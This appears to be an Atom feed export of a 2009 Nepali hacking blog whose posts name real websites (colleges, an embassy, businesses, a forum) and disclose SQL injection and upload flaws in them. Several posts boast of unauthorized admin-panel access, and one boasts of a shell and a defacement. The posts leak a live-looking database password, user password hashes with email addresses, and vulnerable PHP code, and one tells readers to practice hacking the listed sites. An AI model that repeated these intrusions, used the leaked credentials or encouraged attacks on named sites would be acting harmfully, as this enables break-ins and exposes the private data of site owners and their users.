1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_RVRW0sa79Nw/Sy5qxMhZKVI/AAAAAAAAACk/gu9Q5drVspQ/s320/indianembassy.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Absolutely no offense to indian embassy. But we hope you will be securing yourself after this pwnage.&lt;br /&gt;Regards&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4265422271218529909?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/4265422271218529909/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/wwwindianembassyorgnp-sqli.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4265422271218529909'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4265422271218529909'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/wwwindianembassyorgnp-sqli.html' title='www.indianembassy.org.np SQLi vulnerability'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_RVRW0sa79Nw/Sy5qxMhZKVI/AAAAAAAAACk/gu9Q5drVspQ/s72-c/indianembassy.jpg' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-6692154981122610995</id><published>2009-12-19T18:00:00.000-08:00</published><updated>2009-12-19T18:16:44.552-08:00</updated><title type='text'>CCRC (ccrc.edu.np) SQLi Vulnerability</title><content type='html'>A sql injection vuln exists in ccrc college's website.&lt;br /&gt;Details:&lt;br /&gt;URL: http://ccrc.edu.np&lt;br /&gt;FTP: ftp.ccrc.edu.np&lt;br /&gt;FTP status: Very Secure (9.5/10)&lt;br /&gt;SQL injection: Yes(8.5/10, since all critical datas can be extracted)&lt;br /&gt;&lt;br /&gt;Dumps:&lt;br /&gt;rajan:c647f23604314d5aa5bb53ad3def9303 &lt;br /&gt;&lt;br /&gt;Hope they fix it soon&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-6692154981122610995?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/6692154981122610995/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/ccrc-ccrcedunp-sqli-vulnerability.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/6692154981122610995'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/6692154981122610995'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/ccrc-ccrcedunp-sqli-vulnerability.html' title='CCRC (ccrc.edu.np) SQLi Vulnerability'/><author><name>dARK_pHOENIX</name><uri>http://www.blogger.com/profile/11872711864906408375</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-9021012447179932074</id><published>2009-12-19T08:31:00.001-08:00</published><updated>2009-12-19T08:34:01.787-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ccma.edu.np'/><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><title type='text'>ccma.edu.np SQLi vulnerability</title><content type='html'>Not much, but I thought to share it over here.&lt;br /&gt;The official website of Chartered College of Management and Accounts, &lt;a href="http://www.ccma.edu.np" target="_blank"&gt;www.ccma.edu.np&lt;/a&gt; suffers from sql injection attack and hence can be used to extract critical data from the database. Check the site main page &lt;a href="http://www.ccma.edu.np/main.php" target="_blank"&gt;ccma home&lt;/a&gt; to see the vulnerability. I have made redirection to the nep sec blog.&lt;br /&gt;&lt;br /&gt;Thanks&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-9021012447179932074?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/9021012447179932074/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/ccmaedunp-sqli-vulnerability.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/9021012447179932074'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/9021012447179932074'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/ccmaedunp-sqli-vulnerability.html' title='ccma.edu.np SQLi vulnerability'/><author><name>learn3r aka cyb3r lord</name><uri>http://www.blogger.com/profile/08049135959513279608</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-6754019723863742875</id><published>2009-12-17T18:30:00.000-08:00</published><updated>2009-12-17T18:41:18.044-08:00</updated><title type='text'>Universal College(http://www.uc.edu.np) SQL injection Vuln</title><content type='html'>&lt;div&gt;A sql Injection Vuln exists in Universal College's site. A remote attacker can easily get the pwd and login.&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Some details:&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Vuln Type: SQL injection&lt;/div&gt;&lt;br /&gt;&lt;div&gt;FTP: &lt;a href="ftp://ftp.uc.edu.np/"&gt;ftp://ftp.uc.edu.np/&lt;/a&gt; (Proftpd 1.3.0 server//WL)&lt;/div&gt;&lt;br /&gt;&lt;div&gt;VULN RATING: 6/10 (SQL INJECTION), 8/10 (OLD FTP SERVER. MANY EXPLOITS ARE OUT THERE)&lt;/div&gt;&lt;br /&gt;&lt;div&gt;STATUS:Notified&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Some proofs:&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Table_names: login, user&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Dumps:&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Not_REVEALED for security&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Screenshot of Logged in cpanel:&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 520px; DISPLAY: block; HEIGHT: 362px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5416400474126007330" border="0" alt="" src="http://2.bp.blogspot.com/_AJFPBbDsJ2M/SyrriK2JvCI/AAAAAAAAAAM/rUJYnJJoAxY/s320/scrnshot.jpg" /&gt;&lt;/div&gt;Hope they fix it down :D&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-6754019723863742875?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/6754019723863742875/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/universal-collegehttpwwwucedunp-sql.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/6754019723863742875'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/6754019723863742875'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/universal-collegehttpwwwucedunp-sql.html' title='Universal College(http://www.uc.edu.np) SQL injection Vuln'/><author><name>dARK_pHOENIX</name><uri>http://www.blogger.com/profile/11872711864906408375</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_AJFPBbDsJ2M/SyrriK2JvCI/AAAAAAAAAAM/rUJYnJJoAxY/s72-c/scrnshot.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-1577009349953293408</id><published>2009-12-10T03:45:00.000-08:00</published><updated>2009-12-10T03:45:44.351-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='ibb developers'/><title type='text'>Internet Business Bureau Common SQL injection Vulnerability</title><content type='html'>&lt;span id="goog_1260445096014"&gt;&lt;/span&gt;&lt;span id="goog_1260445096015"&gt;&lt;/span&gt;&lt;a href="http://www.blogger.com/"&gt;&lt;/a&gt;I checked the IBB's portfolio and the sites it develops uses the same script and it is vulnerable to SQL injection. Check my previous post for more on knowing this:&lt;br /&gt;&lt;a href="http://nepsecvulns.blogspot.com/2009/12/party-popper-wwwpartypoppercomnp-sqli.html"&gt;http://nepsecvulns.blogspot.com/2009/12/party-popper-wwwpartypoppercomnp-sqli.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The same mysql injection is valid but filtering takes so you need to bypass filters (not hard). I would recommend you to google for mysql injection cheatsheets and learn and practice hacking in these sites.&lt;br /&gt;&lt;br /&gt;Nepali Hackers Are Not Dead, They Are Underground and Might Be At Your Root&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-1577009349953293408?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/1577009349953293408/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/internet-business-bureau-common-sql.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/1577009349953293408'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/1577009349953293408'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/internet-business-bureau-common-sql.html' title='Internet Business Bureau Common SQL injection Vulnerability'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-3288663839711097925</id><published>2009-12-10T03:24:00.000-08:00</published><updated>2009-12-10T03:24:06.783-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='partypopper.com.np'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><title type='text'>Party Popper [www.partypopper.com.np] SQLi vulnerability</title><content type='html'>The site of Party Popper [www.partypopper.com.np] is vulnerable to SQL injection and various information can be stolen. The SQL filtering IDS are working to some extent but we can easily bypass such filters and I was able to do the same.&lt;br /&gt;Anyway, this site has nothing much but still we think that such security flaws must be addressed so that nepali developers work on protecting from such vulnerabilities...&lt;br /&gt;Some tables:&lt;br /&gt;admin&lt;br /&gt;content&lt;br /&gt;&lt;br /&gt;Screenshot of logged admin panel:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_RVRW0sa79Nw/SyDaBX0vCEI/AAAAAAAAACU/Mq0nMOqdV1o/s1600-h/partypopper.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_RVRW0sa79Nw/SyDaBX0vCEI/AAAAAAAAACU/Mq0nMOqdV1o/s320/partypopper.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Thanks. Admins can find the article by me at my site &lt;a href="http://www.sampctricks.blogspot.com/"&gt;http://www.sampctricks.blogspot.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-3288663839711097925?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/3288663839711097925/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/party-popper-wwwpartypoppercomnp-sqli.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/3288663839711097925'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/3288663839711097925'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/party-popper-wwwpartypoppercomnp-sqli.html' title='Party Popper [www.partypopper.com.np] SQLi vulnerability'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_RVRW0sa79Nw/SyDaBX0vCEI/AAAAAAAAACU/Mq0nMOqdV1o/s72-c/partypopper.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-2319556630732581789</id><published>2009-12-10T02:34:00.000-08:00</published><updated>2009-12-10T02:34:54.130-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='engxpress.com.np'/><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><title type='text'>Engineering express [www.engxpress.com.np] Multiple Vulnerabilities</title><content type='html'>The online website of &lt;b&gt;The Engineering Express &lt;/b&gt;http://www.engxpress.com.np is pretty insecure with multiple vulnerabilities. It suffers from SQLi and insecure file upload vulnerability. Anyway below are some dumps from the website:&lt;br /&gt;Few tables:&lt;br /&gt;register&lt;br /&gt;signin&lt;br /&gt;&lt;br /&gt;Columns in signin table:&lt;br /&gt;Username&lt;br /&gt;Password&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Fucking lots of SQLi... &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Login process:&lt;br /&gt;&lt;br /&gt;$stmt=sprintf("SELECT * FROM login WHERE username='%s' AND password='%s'",$usr, $pwd);&lt;br /&gt;$dblink=DBset() ;//Connect to the database...&lt;br /&gt;$result = DBquery($stmt, $dblink) ;//Send Query&lt;br /&gt;$totresult = mysql_num_rows($result);&lt;br /&gt;$row = mysql_fetch_object($result);&lt;br /&gt;&lt;br /&gt;Page.php:&lt;br /&gt;$stmt=sprintf("SELECT Content FROM page WHERE Id='%s'",$_GET['recordID']);&lt;br /&gt;$dblink=DBset() ;//Connect to the database...&lt;br /&gt;&lt;br /&gt;Other scripts are also vulnerable but I am too lazy to post them, too.&lt;br /&gt;&lt;br /&gt;Screenshots:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_RVRW0sa79Nw/SyDNtNgzoQI/AAAAAAAAACM/l1RizPBMvmY/s1600-h/engxpress.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_RVRW0sa79Nw/SyDNtNgzoQI/AAAAAAAAACM/l1RizPBMvmY/s320/engxpress.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;Certainly no offense but you need to improve yourself...&lt;br /&gt;Thanks!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-2319556630732581789?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/2319556630732581789/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/engineering-express-wwwengxpresscomnp.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/2319556630732581789'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/2319556630732581789'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/engineering-express-wwwengxpresscomnp.html' title='Engineering express [www.engxpress.com.np] Multiple Vulnerabilities'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_RVRW0sa79Nw/SyDNtNgzoQI/AAAAAAAAACM/l1RizPBMvmY/s72-c/engxpress.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-6893144109156641270</id><published>2009-12-09T00:00:00.000-08:00</published><updated>2009-12-09T00:00:21.303-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='meroit.com'/><title type='text'>Mero IT (www.meroit.com) SQL injection vulnerability</title><content type='html'>This was referred to me by my friend in the college and on viewing the site, I found it was vulnerable to common SQLi. The scripts do not validate the GET variables and hence we can inject SQL queries through URL GET parameters.&lt;br /&gt;&lt;br /&gt;Some interesting tables:&lt;br /&gt;admin&lt;br /&gt;client&lt;br /&gt;personal_client_details&lt;br /&gt;&lt;br /&gt;Anyway below is the screenshot of the hacked admin panel located at /admin&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_RVRW0sa79Nw/Sx9Yg5Ape9I/AAAAAAAAACE/eVaoEPO6RP4/s1600-h/meroIT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_RVRW0sa79Nw/Sx9Yg5Ape9I/AAAAAAAAACE/eVaoEPO6RP4/s320/meroIT.png" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;So if you are the webadmin of meroit.com you can find the article at http://www.sampctricks.blogspot.com to secure your PHP scripts...&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Thanks...&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-6893144109156641270?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/6893144109156641270/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/mero-it-wwwmeroitcom-sql-injection.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/6893144109156641270'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/6893144109156641270'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/mero-it-wwwmeroitcom-sql-injection.html' title='Mero IT (www.meroit.com) SQL injection vulnerability'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_RVRW0sa79Nw/Sx9Yg5Ape9I/AAAAAAAAACE/eVaoEPO6RP4/s72-c/meroIT.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-4572653930555618477</id><published>2009-12-07T11:17:00.000-08:00</published><updated>2009-12-07T11:31:46.163-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='pea.edu.np'/><title type='text'>www.pea.edu.np simple JS hack</title><content type='html'>Ok this was given to me as a challenge by sam and he said that he was given information about this site by some friend of him. He said me about javascript hacking in admin panel and I started to dig up. And finally I found that it didn't require any login(even the login user/pass is easy one: admin/a). I then found that the upload feature was also insecure. I got the shell and I could have utilized to root the box but I didn't. I just thought to make defacement of pea.edu.np.&lt;br /&gt;&lt;br /&gt;Some PHP dumps:&lt;br /&gt;&lt;br /&gt;addnew.php:&lt;br /&gt;&lt;br /&gt;//clearly reflects their poor coding way...&lt;br /&gt;&amp;lt;?&lt;br /&gt; $path = "../";&lt;br /&gt; //$thePage = "home";&lt;br /&gt; include $path."includes/adminhead.php";&lt;br /&gt; include $path."includes/headeradmin.php";&lt;br /&gt; if($_POST['ok'])&lt;br /&gt;{   &lt;br /&gt;&lt;br /&gt;$date1=$_POST['Date1'];&lt;br /&gt;$title=$_POST['Title'];&lt;br /&gt;  &lt;br /&gt;$newfile=returnfilename($_FILES['fileattach'],"downloads");&lt;br /&gt;&lt;br /&gt;$sqlquery= "INSERT INTO downloads  VALUES('','$date1','$title','$newfile')";&lt;br /&gt;$rt1=mysql_query($sqlquery) or die(mysql_error());&lt;br /&gt; &lt;br /&gt; if($rt1)&lt;br /&gt; { &lt;br /&gt;  print "&amp;lt;script&amp;gt;document.location='download.php';&amp;lt;/script&amp;gt;";&lt;br /&gt;   &lt;br /&gt; }&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;settings.php:&lt;br /&gt;&amp;lt;?&lt;br /&gt;&lt;br /&gt;// Online&lt;br /&gt;/**/&lt;br /&gt;$hostname="localhost";&lt;br /&gt;$username="peaedu_peaedu";&lt;br /&gt;$password="delta2009";&lt;br /&gt;$db="peaedu_peadb";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/* LOCAL *&lt;br /&gt;&lt;br /&gt;$hostname="localhost";&lt;br /&gt;$username="root";&lt;br /&gt;$password="";&lt;br /&gt;$db="pea_db";&lt;br /&gt;*/&lt;br /&gt;$connectme=mysql_connect($hostname,$username,$password);&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now the screenshot of the defaced site:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_R7J4rokcecI/Sx1Wo7PyriI/AAAAAAAAAAs/3aDzeY8V3eA/s1600-h/defaced.jpg"&gt;&lt;img style="cursor: pointer; width: 320px; height: 124px;" src="http://1.bp.blogspot.com/_R7J4rokcecI/Sx1Wo7PyriI/AAAAAAAAAAs/3aDzeY8V3eA/s320/defaced.jpg" alt="" id="BLOGGER_PHOTO_ID_5412577588267888162" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Thanks for reading this... and to site developers, learn fucking sense of security...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4572653930555618477?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/4572653930555618477/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/wwwpeaedunp-simple-js-hack.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4572653930555618477'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4572653930555618477'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/wwwpeaedunp-simple-js-hack.html' title='www.pea.edu.np simple JS hack'/><author><name>learn3r aka cyb3r lord</name><uri>http://www.blogger.com/profile/08049135959513279608</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_R7J4rokcecI/Sx1Wo7PyriI/AAAAAAAAAAs/3aDzeY8V3eA/s72-c/defaced.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-5463770093635568481</id><published>2009-12-07T09:57:00.001-08:00</published><updated>2009-12-07T10:00:16.021-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='myktm.com'/><title type='text'>myktm.com SQLi vulnerability</title><content type='html'>Vuln: SQLi&lt;br /&gt;Serious label: 3/5 (as user/pass can be stolen)&lt;br /&gt;Actually, this hack was reported to us by someone anonymous. We don't have any information about him/her but thanks and full credit goes to you. Anyway, I think many of you have heard about myKtm.com, their skiddish forum and their Nepal messenger. Though I appreciate their effort in creating first Nepali IRC server/channel (I think they are the first), they need to learn about security. They talk in the leet way but they are insecured and since there are thousands of users registered over there, password compromise can be easily done.&lt;br /&gt;&lt;br /&gt;[+] Exploit: SQLi&lt;br /&gt;[+] The script doesn't validate the user input which can be used to do SQL injections and steal the important data from the system.&lt;br /&gt;&lt;br /&gt;Samples [might have been changed since then]:&lt;br /&gt;&lt;br /&gt;username: hash: email&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;admin:b09048fc8f1a2ac608012c327c60f973:admin@nepalexpo.com&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;huribatas:2f1157cdad63b7035e5252880bf6f9cc:huribatas111@hotmail.com&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;LSD:9ae90ad18eb0e8cfde193df7d258c09b:Lsd@myktm.com [admin of myKtm]&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;uTosTan:e7aebaae36f8ba319d46a7142218ef1e:utostan@gmail.com [super admin of myKtm, not sure though]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Ok that was enough to disclose them. I hope they take it positively. I want them to secure themselves. Drop a comment if you are myKtm-er and I will be replying on how to secure it...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-5463770093635568481?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/5463770093635568481/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/myktmcom-sqli-vulnerability.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/5463770093635568481'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/5463770093635568481'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/myktmcom-sqli-vulnerability.html' title='myktm.com SQLi vulnerability'/><author><name>learn3r aka cyb3r lord</name><uri>http://www.blogger.com/profile/08049135959513279608</uri><email>noreply@blogger.com</email><gd:image 